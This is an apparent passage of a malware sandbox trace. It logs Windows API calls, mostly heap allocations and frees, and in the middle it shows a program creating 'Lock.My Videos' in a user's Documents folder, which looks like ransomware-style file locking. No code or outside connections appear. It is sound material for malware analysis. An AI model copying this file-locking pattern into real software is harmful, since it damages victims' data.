[0265.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0265.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0265.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0265.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0265.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0265.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0265.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0265.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0265.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0265.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0265.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0265.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0265.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0265.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0265.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0265.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0265.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0265.096] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 1 [0265.097] TranslateMessage (lpMsg=0x8bf710) returned 0 [0265.097] DispatchMessageW (lpMsg=0x8bf710) returned 0x0 [0265.097] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0265.097] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0265.097] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0265.097] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.097] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0265.097] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0265.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0265.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0265.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0265.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0265.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0265.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0265.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0265.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0265.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x3551008 [0265.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0265.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0265.098] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/My Videos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my videos"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0265.099] GetLastError () returned 0x5 [0265.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0265.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0265.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0265.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0265.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0265.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0265.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0265.099] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0265.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0265.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0265.099] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0265.099] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0265.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0265.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0265.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0265.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0265.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0265.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0265.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0265.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0265.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0265.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x249c7b0 [0265.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.101] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0265.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0265.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0265.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x3551008 [0265.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0265.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0265.101] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Lock.My Videos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lock.my videos"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0265.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0265.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0265.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0265.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0265.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0265.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0265.103] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0265.103] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.103] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0265.104] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0265.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0265.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0265.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0265.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0265.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0265.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0265.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0265.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0265.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0265.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0265.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0265.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0265.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0265.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0265.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0265.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0265.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0265.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0265.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0265.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0265.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0265.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0265.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.106] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0265.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0265.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0265.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1428 [0265.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0265.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0265.114] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0265.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0265.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0265.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0265.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0265.114] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0265.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0265.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0265.114] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0265.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0265.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0265.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0265.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0265.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0265.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1428 [0265.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0265.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0265.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1438 [0265.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0265.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0265.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0265.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1868 [0265.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ed0 [0265.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0265.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0265.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0265.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0265.116] RtlAllocateHeap (HeapHandle=0x25c0000, 